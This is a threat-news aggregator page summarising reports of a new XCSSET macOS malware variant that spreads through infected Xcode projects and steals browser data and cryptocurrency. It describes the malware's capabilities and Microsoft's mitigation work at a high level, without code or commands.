XCSSET macOS malware variant targets Xcode developers with enhanced persistence and cryptocurrency theft

First reported

26.09.2025 01:49

Last updated

1 unique sources, 1 articles

Summary

Hide ▲

A new variant of the XCSSET macOS malware targets Xcode developers with enhanced browser targeting, clipboard hijacking, and improved persistence mechanisms. The malware spreads by infecting Xcode projects, stealing cryptocurrency, and browser data. It is currently observed in limited attacks. Microsoft has identified several new features in the latest XCSSET variant, including the ability to steal Firefox browser data, hijack cryptocurrency transactions, and employ new persistence methods. The malware compromises Xcode projects, which are commonly shared among developers, to propagate and execute during the build process.

Timeline

26.09.2025 01:49 1 articles · 6h ago

New XCSSET macOS malware variant targets Xcode developers
A new variant of the XCSSET macOS malware has been detected, targeting Xcode developers with enhanced browser targeting, clipboard hijacking, and improved persistence mechanisms. The malware spreads by infecting Xcode projects, stealing cryptocurrency, and browser data. It is currently observed in limited attacks. The new variant includes the ability to steal Firefox browser data, hijack cryptocurrency transactions, and employ new persistence methods. Microsoft has shared findings with Apple and GitHub to mitigate the threat.
Show sources

Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
Open in new tab

Information Snippets

XCSSET is a modular macOS malware that steals Notes, cryptocurrency wallets, and browser data.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
The malware spreads by infecting Xcode projects, executing during the build process.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
The new variant targets Firefox browser data using a modified HackBrowserData tool.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
The malware includes a clipboard-hijacking component that replaces cryptocurrency addresses with attacker-controlled addresses.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
New persistence methods include creating LaunchDaemon entries and fake System Settings.app.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
The malware is currently observed in limited attacks.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
Microsoft has shared findings with Apple and GitHub to mitigate the threat.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
Developers are advised to inspect Xcode projects before building, especially if shared by others.
First reported: 26.09.2025 01:49

1 source, 1 article
Show sources
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49

Summary

Timeline

New XCSSET macOS malware variant targets Xcode developers

Information Snippets